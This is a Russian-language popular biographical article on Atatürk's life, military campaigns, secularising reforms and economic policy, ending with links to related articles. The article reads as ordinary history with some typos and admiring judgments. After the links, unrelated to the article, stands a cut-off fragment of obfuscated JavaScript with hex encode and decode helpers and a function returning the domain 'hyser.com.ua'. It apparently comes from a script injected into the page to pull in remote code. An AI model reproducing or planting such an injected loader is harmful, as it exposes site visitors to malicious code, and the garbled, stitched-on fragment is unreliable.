Первый президент Турецкой Республики и в наши дни остается культовой личностью для жителей своей страны. Его имя носят главные улицы и площади большинства турецких населенных пунктов. В центре каждого города стоит памятник «Отца нации», а портреты Ататюрка украшают все без исключения турецкие деньги. В Турции вряд ли найдется хотя бы один политик или общественный деятель, который позволит себе поставить под сомнение величие Ататюрка.

Как бы не развивались политические события в Турции, кто бы не руководил страной, сложно представить, что может побудить страну отказаться от идеологического наследия Мустафы Кемаля Ататюрка. Кем же был Отец турок и как ему удалось навсегда вписать свое имя в историю Турции?

Начало большого пути

Мустафа Кемаль Ататюрк родился в 1881 году в турецком городе Селяник (в наше время Салоники в Греции) в семье лесоторговца Али Ризы. Точная дата рождения Мустафы до сих пор находится под вопросом. Большинство исследователей указывает на 12 марта, однако сам Ататюрк говорил, что родился 19 мая. В этот день в 1919 году он провозгласил начало войны за независимость против иностранных оккупантов. Эту дату в Турции считают его официальным днем рождения.

Отец Ататюрка имел албанские корни, а мать – македонские. Впрочем, родители Мустафы были правоверными мусульманами и считали себя турками. Селяник был многонациональным городом, поэтому с детства Мустафа общался с представителями разных народов. Мальчик был очень волевым и амбициозным. В пятилетнем возрасте он сказал родителям, что станет военным и дослужится до звания генерала-паши. В семь лет Мустафа потерял отца, и мать начала требовать, чтобы он учился на муллу. Однако в 12-летнем возрасте Ататюрк все же втайне сдал экзамены в начальную военную школу Селяника. Именно здесь за ним закрепилось прозвище «Кемаль» (на турецком– «совершенство»), которое дал Мустафе учитель математики. Мальчику понравилось имя, и он начал всегда представляться Кемалем.

В 1896 году Ататюрк с отличием закончил начальную военную школу и поступил в среднюю военную школу города Манастир. В 1899 году Мустафу как лучшего кадета курса отправили в элитный Оттоманский военный колледж в Стамбуле. После его окончания 21-летний лейтенант продолжает учебу в Академии генерального штаба. Этот случай стал уникальным, ведь до поступления в академию любой офицер должен был несколько лет прослужить в войсках.

В последние годы обучения Ататюрк начал увлекаться политикой. Вскоре он присоединился к тайному обществу младотурков «Ватан». Но в декабре 1904 года из-за доноса одного из членов группы многие ее участники, в том числе Ататюрк, были арестованы. Мустафе помогла политическая нестабильность внутри Османской империи. Султан Абдул-Хамид II больше не мог противостоять влиянию младотурков в армии, поэтому Кемаль отделался достаточно мягким наказанием. Его отправили на службу в Дамаск, а в 1907 году он даже получил повышение.

В 1908 году произошла младотурецкая революция, однако политика младотурков разочаровала Кемаля, который посчитал ее зависимой и неэффективной. Ататюрк разорвал связи с бывшими соратниками, обвинив их в отказе от идеалов революционных изменений и стремления к установлению военного режима.

Великий полководец

Лидеры младотурков беспокоились из-за растущей популярности Мустафы Ататюрка, поэтому решили в 1909 году отправить его во Францию. Кризис внутри Османской империи позволил Ататюрку продемонстрировать талант превосходного полководца. Он принимал участие в обеих Балканских войнах, был на Сирийско-Палестинском фронте, а после триумальной операции на Чанаккале против франко-британского флота его стали называть «Спасителем Стамбула».

Популярность Кемаля Ататюрка заметно превышала популярность правительства младотурков. Накануне Первой мировой войны стал очевидным крах внешней политики Турции. Страна попала под влияние Германии, которая взяла под контроль политику, экономику и вооруженные силы страны. Ататюрк стал командующим дивизией 1-й армии, которой доверили оборону проливов и столицы империи от войск Антанты.

В 1916 году Ататюрк получает титул паши, став одним из немногих выходцев из низов, носящих это почетное звание. Когда в 1918 году был объявлен Мудросский мир, стало очевидно, что Османская империя проиграла войну.  Оба пролива остались открытыми для иностранцев и вместе со столицей страны Стамбулом подвергались дальнейшей оккупации. 9 мая 1919 года Ататюрк демонстративно покидает оккупированную столицу и направляется в город Сивас с мандатом инспектора 9-й армии. Здесь Мустафа Ататюрк начинает собирать силы для противостояния оккупантам. Турецкие политики полагали, что он потерял здравый смысл: если Турция проиграла войну вместе с Германией, то самостоятельно она ничего не сможет сделать против мощного противника.

Однако Кемаль приступил к формированию новых республиканских органов власти. 23 апреля 1920 года а Анкаре открылось Великое национальное собрание Турции, которое заявило о себе как о главном органе власти в стране. Правда, официально монархия продолжала существовать, поскольку султанат-халифат пользовался авторитетом среди крестьян. Формально провозглашение республики произошло только в 1923 году.

Тем временем Ататюрк одержал победу еще в двух войнах. Осенью 1920 года отряды кемалистов разбили войска независимой Армении. Эта схватка была репетицией перед судьбоносной для Турции греко-турецкой войной 1919–1923 годов. Она началась из-за того, что правительство Кемаля категорически отказалось передавать Греции Измир, хотя этого требовал Севрский договор. Антанта направила вышколенную и хорошо вооруженную греческую армию для усмирения непокорного лидера.

Сперва греческим войскам удалось добраться почти до Анкары. Но Кемаль Ататюрк смог довольно быстро сформировать из вчерашних партизан и добровольцев боеспособную армию и воодушевить на борьбу бедных анатолийских крестьян. Кроме того, Турция смогла заручиться поддержкой Советской России. В результате греки были разбиты, а командир их армии генерал Трипикус попал в турецкий плен.  9 сентября 1922 года турецкая армия во главе с Ататюрком триумфально вступила в Измир.

После победной поступи турецкой армии греческое население Константинополя, Восточной Фракии и Малой Азии (около 1,5 млн человек) было изгнано в Грецию. Тем временем из Эпира, Македонии и Западной Фракии в Турцию переместили 600 тыс. мусульман, преимущественно турок. Султан Мехмед VI сбежал из Турции на британском линкоре «Малайя», а Кемаль Ататюрк вступил в Стамбул. Великий полководец одержал самую важную победу.

24 июля 1923 года после подписания Лозаннского договора был положен конец войне между Турцией и Антантой. 29 октября была провозглашена Турецкая Республика.

Реформатор века

Когда Ататюрк пришел ко власти, он был вынужден радикально менять государство. Ведь ранее никто не имел права ставить под сомнение авторитет султана, а исламские обычаи считались священными. Главное достижение Мустафы Кемаля заключается в том, что он не только смог внедрить новые нормы жизни, но и в корне изменить менталитет жителей Турции, для которых главную роль в жизни играла религия. Ататюрк убедил соотечественников, что без смелых трансформаций нельзя добиться успеха.

Кемаль Ататюрк смог сделать то, что на протяжении столетий не удавалось многим амбициозным реформаторам. Он внедрил в Турции элементы европейского государственного управления и не допустил их отторжения. Радикальные реформы Ататюрка можно сравнить с деятельностью Петра І в России. В частности, Кемаль абсолютно изменил турецкую национальную идеологию. Если Османская империя провозгласила себя главным исламским государством и защитником всех «правоверных», то кемалистская республика выступала в качестве национального государства турок. «Какое счастье – иметь возможность гордо сказать: «Я – турок», – писал «Отец нации».

Полностью завершить этот сложный процесс удалось лишь в 1937 году.  Ататюрк отменил феодальные земельные отношения, смог избавить турецкую финансовую систему от иностранного контроля, делал все необходимое для развития сельского хозяйства и промышленности.

Именно Кемаль решил ввести европейскую одежду и запретил мужчинам одевать фески и тюрбаны. Женщинам, в свою очередь, не позволяли закрывать лицо в публичных местах. Все учебные заведения в Турции перешли под контроль государства, в 1933 году в стране возникла система университетов европейского образца.

В 1934 году в Турецкой Республике вводят фамилии. До этого момента в турок были только имена и прозвища. На Великом национальном собрании президент получил фамилию Ататюрк, которую согласно закону не мог носить никто другой в стране, даже дети самого Кемаля. Впрочем, родных детей у Ататюрка не было. Женился он в 1923 году на дочери турецкого коммерсанта из Измира Латифе Ушаклигиль. Однако через два года пара рассталась. Кемаль усыновил десять сирот, которые были детьми погибших в войне за независимость солдат.

Отношения Ататюрка к исламу было неоднозначным. Невзирая на то, что он подчеркивал свою веру, Кемаль выступал за отделение религии от государства и останавливал любые попытки священнослужителей принимать участие в политической или общественной жизни. Чрезвычайная религиозность не приветствовалась и в турецкой армии, которая стала главной опорой Кемаля Ататюрка.

Политическая система, построенная Ататюрком, была очень демократической. Фактически Турция стала президентско-парламентской республикой.  Однако Кемаль расправлялся со всеми силами, которые, по его мнению, таили угрозу для власти Народной партии. Например, еще в 1921 году он уничтожил всех лидеров созданной годом ранее Коммунистической партии Турции.

Экономическое чудо имени Ататюрка

Изменения в масштабе целой нации, большинство представителей которой исповедовало ислам, происходили с трудом. Но Мустафа Кемаль поставил себе цель возродить национальную идею, ради которой необходимо было создать сверхдержаву, в том числе в плане экономического развития. Ататюрк был военным и, мягко говоря, не сильно разбирался в экономике. Однако талант стратега помог ему правильно расставить приоритеты в этой отрасли. В первые десять лет после провозглашения республики экономика Турции базировалась на государственном регулировании и стимулировании. Национальные производители получили от правительства значительные преференции. В начале 30-х годов финансовые ресурсы страны направлялись в промышленность, но из-за нехватки активов такая политика не сразу себя оправдала.

Кемаль Ататюрк сделал ставку на частную инициативу, хотя он и понимал, что в Турции не существовало предпринимательского класса, а вся торговля находилась в руках иностранцев. Правительство занялось привлечением инвестиций, усовершенствованием железной дороги, модернизацией промышленных объектов. Чтобы уменьшить зависимость от иностранных финансов, в стране была создана национальная банковская система. Кроме того, стартовало масштабное строительство шахт, электростанций и заводов. Кардинальные реформы быстро привлекли внимание иностранных инвесторов.

Экономические реформы также затронули и сельское хозяйство. В частности, Кемаль Ататюрк отменил средневековое налогообложение крестьян и утвердил политику стимулирования развития сельского хозяйства. В это время в Турции удалось создать образцовые сельскохозяйственные предприятия, даже в отдаленных населенных пунктах были построены качественные дороги.

Ататюрк воплощал в жизнь задуманные реформы последовательно и оперативно. Одним из факторов его успеха был прирожденный ораторский талант. В его выступлениях рефреном звучало слово «цивилизация». Так президент акцентировал внимание на том, что  его главной целью является обновление Турции и создание на ее территории современной, развитой цивилизации.

Ататюрк всегда считал, что граждане с психологией бедняка не способны построить богатое государство. Незадолго до своей смерти он подарил собственные земли казначейству, а часть недвижимости отдал мэриям Анкары, Бурсы и различным образовательным организациям. Этот поступок принес первому президенту Турции еще больше народной любви и уважения.

Умер Мустафа Кемаль Ататюрк 10 ноября 1938 года в 57-летнем возрасте в султанском дворце Долмабахче в Стамбуле от цирроза печени. Похоронили Ататюрка в огромном мавзолее Аныткабир, который специально для Кемаля построили в Анкаре — городе, куда он перенес столицу из Стамбула.

При жизни Ататюрка Турция не успела сравниться с передовыми странами мира. Но именно благодаря ему Турецкая Республика не только смогла отстоять независимость, но и внедрить европейские элементы государственности в мусульманской стране. А уже через несколько десятков лет после смерти «Отца нации» из посеянных им зерен вырастет сильная и современная страна, с которой будут считаться во всем мире.

Читайте также:

Импульсивный диктатор Ким Чен Ын

Серебряная бедность: как Аргентина погубила свою экономику

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «hyser.com.ua»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e